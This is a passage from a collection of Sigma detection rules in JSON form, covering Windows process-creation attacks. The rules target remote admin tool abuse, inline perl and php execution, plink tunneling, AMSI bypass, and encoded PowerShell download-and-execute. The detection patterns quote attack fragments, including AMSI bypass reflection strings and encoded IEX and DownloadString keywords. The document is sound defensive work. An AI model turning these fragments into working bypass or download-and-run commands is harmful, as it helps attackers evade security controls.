filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pdqdeploy_execution.yml",
    "content": "title: PDQ Deploy Remote Administration Tool Execution\nid: d679950c-abb7-43a6-80fb-2a480c4fc450\nrelated:\n    - id: 12b8e9f5-96b2-41e1-9a42-8c6779a5c184\n      type: similar\nstatus: test\ndescription: Detects use of the PDQ Deploy remote admin tool\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md\n    - https://www.pdq.com/pdq-deploy/\nauthor: frack113\ndate: 2022-10-01\nmodified: 2023-01-30\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1072\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: PDQ Deploy Console\n        - Product: PDQ Deploy\n        - Company: PDQ.com\n        - OriginalFileName: PDQDeployConsole.exe\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml",
    "content": "title: Potentially Suspicious Execution Of PDQDeployRunner\nid: 12b8e9f5-96b2-41e1-9a42-8c6779a5c184\nrelated:\n    - id: d679950c-abb7-43a6-80fb-2a480c4fc450\n      type: similar\nstatus: test\ndescription: Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on remote machines\nreferences:\n    - https://twitter.com/malmoeb/status/1550483085472432128\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-22\nmodified: 2024-05-02\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|contains: '\\PDQDeployRunner-'\n    selection_child:\n        # Improve this section by adding other suspicious processes, commandlines or paths\n        - Image|endswith:\n              # If you use any of the following processes legitimately comment them out\n              - '\\bash.exe'\n              - '\\certutil.exe'\n              - '\\cmd.exe'\n              - '\\csc.exe'\n              - '\\cscript.exe'\n              - '\\dllhost.exe'\n              - '\\mshta.exe'\n              - '\\msiexec.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\scriptrunner.exe'\n              - '\\wmic.exe'\n              - '\\wscript.exe'\n              - '\\wsl.exe'\n        - Image|contains:\n              - ':\\ProgramData\\'\n              - ':\\Users\\Public\\'\n              - ':\\Windows\\TEMP\\'\n              - '\\AppData\\Local\\Temp'\n        - CommandLine|contains:\n              - ' -decode '\n              - ' -enc '\n              - ' -encodedcommand '\n              - ' -w hidden'\n              - 'DownloadString'\n              - 'FromBase64String'\n              - 'http'\n              - 'iex '\n              - 'Invoke-'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the PDQDeploy tool to execute these commands\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml",
    "content": "title: Perl Inline Command Execution\nid: f426547a-e0f7-441a-b63e-854ac5bdf54d\nstatus: test\ndescription: Detects execution of perl using the \"-e\"/\"-E\" flags. This could be used as a way to launch a reverse shell or execute live perl code.\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\perl.exe'\n        - OriginalFileName: 'perl.exe' # Also covers perlX.XX.exe\n    selection_cli:\n        CommandLine|contains: ' -e'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml",
    "content": "title: Php Inline Command Execution\nid: d81871ef-5738-47ab-9797-7a9c90cd4bfb\nstatus: test\ndescription: Detects execution of php using the \"-r\" flag. This could be used as a way to launch a reverse shell or execute live php code.\nreferences:\n    - https://www.php.net/manual/en/features.commandline.php\n    - https://www.revshells.com/\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\php.exe'\n        - OriginalFileName: 'php.exe'\n    selection_cli:\n        CommandLine|contains: ' -r'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ping_hex_ip.yml",
    "content": "title: Ping Hex IP\nid: 1a0d4aba-7668-4365-9ce4-6d79ab088dfd\nstatus: test\ndescription: Detects a ping command that uses a hex encoded IP address\nreferences:\n    - https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna\n    - https://twitter.com/vysecurity/status/977198418354491392\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-03-23\nmodified: 2025-10-17\ntags:\n    - attack.defense-evasion\n    - attack.t1140\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\ping.exe'\n        CommandLine|re: '0x[a-fA-F0-9]{8}'\n    condition: selection\nfalsepositives:\n    - Unlikely, because no sane admin pings IP addresses in a hexadecimal form\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pktmon_execution.yml",
    "content": "title: PktMon.EXE Execution\nid: f956c7c1-0f60-4bc5-b7d7-b39ab3c08908\nstatus: test\ndescription: Detects execution of PktMon, a tool that captures network packets.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Pktmon/\nauthor: frack113\ndate: 2022-03-17\nmodified: 2023-06-23\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1040\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\pktmon.exe'\n        - OriginalFileName: 'PktMon.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_plink_port_forwarding.yml",
    "content": "title: Suspicious Plink Port Forwarding\nid: 48a61b29-389f-4032-b317-b30de6b95314\nstatus: test\ndescription: Detects suspicious Plink tunnel port forwarding to a local port\nreferences:\n    - https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/\n    - https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-19\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.t1572\n    - attack.lateral-movement\n    - attack.t1021.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Description: 'Command-line SSH, Telnet, and Rlogin client'\n        CommandLine|contains: ' -R '\n    condition: selection\nfalsepositives:\n    - Administrative activity using a remote port forwarding to a local port\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_plink_susp_tunneling.yml",
    "content": "title: Potential RDP Tunneling Via Plink\nid: f38ce0b9-5e97-4b47-a211-7dc8d8b871da\nrelated:\n    - id: f7d7ebd5-a016-46e2-9c54-f9932f2d386d # ssh.exe\n      type: similar\nstatus: test\ndescription: Execution of plink to perform data exfiltration and tunneling\nreferences:\n    - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-04\nmodified: 2023-01-27\ntags:\n    - attack.command-and-control\n    - attack.t1572\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_a:\n        Image|endswith: '\\plink.exe'\n        CommandLine|contains: ':127.0.0.1:3389'\n    selection_b1:\n        Image|endswith: '\\plink.exe'\n        CommandLine|contains: ':3389'\n    selection_b2:\n        CommandLine|contains:\n            - ' -P 443'\n            - ' -P 22'\n    condition: selection_a or all of selection_b*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powercfg_execution.yml",
    "content": "title: Suspicious Powercfg Execution To Change Lock Screen Timeout\nid: f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b\nstatus: test\ndescription: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout\nreferences:\n    - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\n    - https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options\nauthor: frack113\ndate: 2022-11-18\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_power:\n        - Image|endswith: '\\powercfg.exe'\n        - OriginalFileName: 'PowerCfg.exe'\n    selection_standby:\n        # powercfg.exe /SETACVALUEINDEX SCHEME_CURRENT SUB_VIDEO VIDEOCONLOCK\n        - CommandLine|contains|all:\n              - '/setacvalueindex '\n              - 'SCHEME_CURRENT'\n              - 'SUB_VIDEO'\n              - 'VIDEOCONLOCK'\n        # powercfg -change -standby-timeout-dc 3000\n        # powercfg -change -standby-timeout-ac 3000\n        - CommandLine|contains|all:\n              - '-change '\n              - '-standby-timeout-'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml",
    "content": "title: AADInternals PowerShell Cmdlets Execution - ProcessCreation\nid: c86500e9-a645-4680-98d7-f882c70c1ea3\nrelated:\n    - id: 91e69562-2426-42ce-a647-711b8152ced6\n      type: similar\nstatus: test\ndescription: Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365 which can be abused by threat actors to attack Azure AD or Office 365.\nreferences:\n    - https://o365blog.com/aadinternals/\n    - https://github.com/Gerenios/AADInternals\nauthor: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2022-12-23\nmodified: 2025-02-06\ntags:\n    - attack.execution\n    - attack.reconnaissance\n    - attack.discovery\n    - attack.credential-access\n    - attack.impact\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\powershell_ise.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.Exe'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains:\n            # Since most of the cmdlets use a unique enough string which is \"-AADInt\" we only used that portion. For a complete list please check the references linked above\n            - 'Add-AADInt'\n            - 'ConvertTo-AADInt'\n            - 'Disable-AADInt'\n            - 'Enable-AADInt'\n            - 'Export-AADInt'\n            - 'Find-AADInt'\n            - 'Get-AADInt'\n            - 'Grant-AADInt'\n            - 'Initialize-AADInt'\n            - 'Install-AADInt'\n            - 'Invoke-AADInt'\n            - 'Join-AADInt'\n            - 'New-AADInt'\n            - 'Open-AADInt'\n            - 'Read-AADInt'\n            - 'Register-AADInt'\n            - 'Remove-AADInt'\n            - 'Reset-AADInt'\n            - 'Resolve-AADInt'\n            - 'Restore-AADInt'\n            - 'Save-AADInt'\n            - 'Search-AADInt'\n            - 'Send-AADInt'\n            - 'Set-AADInt'\n            - 'Start-AADInt'\n            - 'Unprotect-AADInt'\n            - 'Update-AADInt'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the library for administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml",
    "content": "title: Potential Active Directory Enumeration Using AD Module - ProcCreation\nid: 70bc5215-526f-4477-963c-a47a5c9ebd12\nrelated:\n    - id: 9e620995-f2d8-4630-8430-4afd89f77604\n      type: similar\n    - id: 74176142-4684-4d8a-8b0a-713257e7df8e\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dll\" DLL, which is often used by attackers to perform AD enumeration.\nreferences:\n    - https://github.com/samratashok/ADModule\n    - https://twitter.com/cyb3rops/status/1617108657166061568?s=20\n    - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges\nauthor: frack113\ndate: 2023-01-22\ntags:\n    - attack.reconnaissance\n    - attack.discovery\n    - attack.impact\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cmdlet:\n        CommandLine|contains:\n            - 'Import-Module '\n            - 'ipmo '\n    selection_dll:\n        CommandLine|contains: 'Microsoft.ActiveDirectory.Management.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the library for administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml",
    "content": "title: Add Windows Capability Via PowerShell Cmdlet\nid: b36d01a3-ddaf-4804-be18-18a6247adfcd\nrelated:\n    - id: 155c7fd5-47b4-49b2-bbeb-eb4fab335429\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Add-WindowsCapability\" cmdlet to add Windows capabilities. Notable capabilities could be \"OpenSSH\" and others.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell\n    - https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-22\nmodified: 2023-05-09\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cmdlet:\n        CommandLine|contains: 'Add-WindowsCapability'\n    selection_capa:\n        CommandLine|contains: 'OpenSSH.' # For both \"OpenSSH.Server\" and \"OpenSSH.Client\"\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml",
    "content": "title: Potential AMSI Bypass Via .NET Reflection\nid: 30edb182-aa75-42c0-b0a9-e998bb29067c\nrelated:\n    - id: 4f927692-68b5-4267-871b-073c45f4f6fe\n      type: obsolete\nstatus: test\ndescription: Detects requests to \"amsiInitFailed\" that can be used to disable AMSI scanning\nreferences:\n    - https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/\n    - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\nauthor: Markus Neis, @Kostastsale\ndate: 2018-08-17\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains|all:\n              - 'System.Management.Automation.AmsiUtils'\n              - 'amsiInitFailed'\n        - CommandLine|contains|all:\n              - '[Ref].Assembly.GetType'\n              - 'SetValue($null,$true)'\n              - 'NonPublic,Static'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml",
    "content": "title: Potential AMSI Bypass Using NULL Bits\nid: 92a974db-ab84-457f-9ec0-55db83d7a825\nrelated:\n    - id: fa2559c8-1197-471d-9cdd-05a0273d4522\n      type: similar\nstatus: test\ndescription: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities\nreferences:\n    - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-04\nmodified: 2023-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - \"if(0){{{0}}}' -f $(0 -as [char]) +\"\n            - \"#<NULL>\"\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml",
    "content": "title: Audio Capture via PowerShell\nid: 932fb0d8-692b-4b0f-a26e-5643a50fe7d6\nstatus: test\ndescription: Detects audio capture via PowerShell Cmdlet.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html\n    - https://github.com/frgnca/AudioDeviceCmdlets\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-24\nmodified: 2023-04-06\ntags:\n    - attack.collection\n    - attack.t1123\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'WindowsAudioDevice-Powershell-Cmdlet'\n            - 'Toggle-AudioDevice'\n            - 'Get-AudioDevice '\n            - 'Set-AudioDevice '\n            - 'Write-AudioDevice '\n    condition: selection\nfalsepositives:\n    - Legitimate audio capture by legitimate user.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml",
    "content": "title: Suspicious Encoded PowerShell Command Line\nid: ca2092a1-c273-4878-9b4b-0d60115bf5ea\nstatus: test\ndescription: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)\nreferences:\n    - https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e\nauthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community\ndate: 2018-09-03\nmodified: 2023-04-06\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli_enc:\n        CommandLine|contains: ' -e' # covers -en and -enc\n    selection_cli_content:\n        CommandLine|contains:\n            - ' JAB'\n            - ' SUVYI'\n            - ' SQBFAFgA'\n            - ' aQBlAHgA'\n            - ' aWV4I'\n            - ' IAA'\n            - ' IAB'\n            - ' UwB'\n            - ' cwB'\n    selection_standalone:\n        CommandLine|contains:\n            - '.exe -ENCOD '\n            - ' BA^J e-' # Reversed\n    filter_optional_remote_signed:\n        CommandLine|contains: ' -ExecutionPolicy remotesigned '\n    condition: selection_img and (all of selection_cli_* or selection_standalone) and not 1 of filter_optional_*\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd_patterns.yml",
    "content": "title: Suspicious PowerShell Encoded Command Patterns\nid: b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c\nstatus: test\ndescription: Detects PowerShell command line patterns in combination with encoded commands that often appear in malware infection chains\nreferences:\n    - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-05-24\nmodified: 2023-01-05\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.Exe'\n              - 'pwsh.dll'\n    selection_flags:\n        CommandLine|contains:\n            - ' -e '\n            - ' -en '\n            - ' -enc '\n            - ' -enco'\n    selection_encoded:\n        CommandLine|contains:\n            - ' JAB'\n            - ' SUVYI'\n            - ' SQBFAFgA'\n            - ' aWV4I'\n            - ' IAB'\n            - ' PAA'\n            - ' aQBlAHgA'\n    filter_gcworker:\n        ParentImage|contains:\n            - 'C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\'\n            - '\\gc_worker.exe'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Other tools that work with encoded scripts in the command line instead of script files\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_obfusc.yml",
    "content": "title: Suspicious Obfuscated PowerShell Code\nid: 8d01b53f-456f-48ee-90f6-bc28e67d4e35\nstatus: test\ndescription: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines\nreferences:\n    - https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-11\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            #  -bxor 0x\n            - 'IAAtAGIAeABvAHIAIAAwAHgA'\n            - 'AALQBiAHgAbwByACAAMAB4A'\n            - 'gAC0AYgB4AG8AcgAgADAAeA'\n            # .Invoke() |\n            - 'AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg'\n            - 'AuAEkAbgB2AG8AawBlACgAKQAgAHwAI'\n            - 'ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC'\n            # {1}{0}\" -f\n            # {0}{3}\" -f\n            # {2}{0}\" -f\n            - 'AHsAMQB9AHsAMAB9ACIAIAAtAGYAI'\n            - 'B7ADEAfQB7ADAAfQAiACAALQBmAC'\n            - 'AewAxAH0AewAwAH0AIgAgAC0AZgAg'\n            - 'AHsAMAB9AHsAMwB9ACIAIAAtAGYAI'\n            - 'B7ADAAfQB7ADMAfQAiACAALQBmAC'\n            - 'AewAwAH0AewAzAH0AIgAgAC0AZgAg'\n            - 'AHsAMgB9AHsAMAB9ACIAIAAtAGYAI'\n            - 'B7ADIAfQB7ADAAfQAiACAALQBmAC'\n            - 'AewAyAH0AewAwAH0AIgAgAC0AZgAg'\n            # {1}{0}' -f\n            # {0}{3}' -f\n            # {2}{0}' -f\n            - 'AHsAMQB9AHsAMAB9ACcAIAAtAGYAI'\n            - 'B7ADEAfQB7ADAAfQAnACAALQBmAC'\n            - 'AewAxAH0AewAwAH0AJwAgAC0AZgAg'\n            - 'AHsAMAB9AHsAMwB9ACcAIAAtAGYAI'\n            - 'B7ADAAfQB7ADMAfQAnACAALQBmAC'\n            - 'AewAwAH0AewAzAH0AJwAgAC0AZgAg'\n            - 'AHsAMgB9AHsAMAB9ACcAIAAtAGYAI'\n            - 'B7ADIAfQB7ADAAfQAnACAALQBmAC'\n            - 'AewAyAH0AewAwAH0AJwAgAC0AZgAg'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml",
    "content": "title: PowerShell Base64 Encoded FromBase64String Cmdlet\nid: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c\nstatus: test\ndescription: Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-08-24\nmodified: 2023-04-06\ntags:\n    - attack.defense-evasion\n    - attack.t1140\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|base64offset|contains: '::FromBase64String'\n        # UTF-16 LE\n        - CommandLine|contains:\n              - 'OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA'\n              - 'oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA'\n              - '6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_hidden_flag.yml",
    "content": "title: Malicious Base64 Encoded PowerShell Keywords in Command Lines\nid: f26c6093-6f14-4b12-800f-0fcb46f5ffd0\nstatus: test\ndescription: Detects base64 encoded strings used in hidden malicious PowerShell command lines\nreferences:\n    - http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/\nauthor: John Lambert (rule)\ndate: 2019-01-16\nmodified: 2023-01-05\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_hidden:\n        CommandLine|contains: ' hidden '\n    selection_encoded:\n        CommandLine|contains:\n            - 'AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA'\n            - 'aXRzYWRtaW4gL3RyYW5zZmVy'\n            - 'IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA'\n            - 'JpdHNhZG1pbiAvdHJhbnNmZX'\n            - 'YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg'\n            - 'Yml0c2FkbWluIC90cmFuc2Zlc'\n            - 'AGMAaAB1AG4AawBfAHMAaQB6AGUA'\n            - 'JABjAGgAdQBuAGsAXwBzAGkAegBlA'\n            - 'JGNodW5rX3Npem'\n            - 'QAYwBoAHUAbgBrAF8AcwBpAHoAZQ'\n            - 'RjaHVua19zaXpl'\n            - 'Y2h1bmtfc2l6Z'\n            - 'AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A'\n            - 'kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg'\n            - 'lPLkNvbXByZXNzaW9u'\n            - 'SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA'\n            - 'SU8uQ29tcHJlc3Npb2'\n            - 'Ty5Db21wcmVzc2lvb'\n            - 'AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ'\n            - 'kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA'\n            - 'lPLk1lbW9yeVN0cmVhb'\n            - 'SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A'\n            - 'SU8uTWVtb3J5U3RyZWFt'\n            - 'Ty5NZW1vcnlTdHJlYW'\n            - '4ARwBlAHQAQwBoAHUAbgBrA'\n            - '5HZXRDaHVua'\n            - 'AEcAZQB0AEMAaAB1AG4Aaw'\n            - 'LgBHAGUAdABDAGgAdQBuAGsA'\n            - 'LkdldENodW5r'\n            - 'R2V0Q2h1bm'\n            - 'AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A'\n            - 'QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA'\n            - 'RIUkVBRF9JTkZPNj'\n            - 'SFJFQURfSU5GTzY0'\n            - 'VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA'\n            - 'VEhSRUFEX0lORk82N'\n            - 'AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA'\n            - 'cmVhdGVSZW1vdGVUaHJlYW'\n            - 'MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA'\n            - 'NyZWF0ZVJlbW90ZVRocmVhZ'\n            - 'Q3JlYXRlUmVtb3RlVGhyZWFk'\n            - 'QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA'\n            - '0AZQBtAG0AbwB2AGUA'\n            - '1lbW1vdm'\n            - 'AGUAbQBtAG8AdgBlA'\n            - 'bQBlAG0AbQBvAHYAZQ'\n            - 'bWVtbW92Z'\n            - 'ZW1tb3Zl'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml",
    "content": "title: PowerShell Base64 Encoded IEX Cmdlet\nid: 88f680b8-070e-402c-ae11-d2914f2257f1\nstatus: test\ndescription: Detects usage of a base64 encoded \"IEX\" cmdlet in a process command line\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-08-23\nmodified: 2023-04-06\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|base64offset|contains:\n              - 'IEX (['\n              - 'iex (['\n              - 'iex (New'\n              - 'IEX (New'\n              - 'IEX(['\n              - 'iex(['\n              - 'iex(New'\n              - 'IEX(New'\n              - \"IEX(('\"\n              - \"iex(('\"\n        # UTF16 LE\n        - CommandLine|contains:\n              - 'SQBFAFgAIAAoAFsA'\n              - 'kARQBYACAAKABbA'\n              - 'JAEUAWAAgACgAWw'\n              - 'aQBlAHgAIAAoAFsA'\n              - 'kAZQB4ACAAKABbA'\n              - 'pAGUAeAAgACgAWw'\n              - 'aQBlAHgAIAAoAE4AZQB3A'\n              - 'kAZQB4ACAAKABOAGUAdw'\n              - 'pAGUAeAAgACgATgBlAHcA'\n              - 'SQBFAFgAIAAoAE4AZQB3A'\n              - 'kARQBYACAAKABOAGUAdw'\n              - 'JAEUAWAAgACgATgBlAHcA'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml",
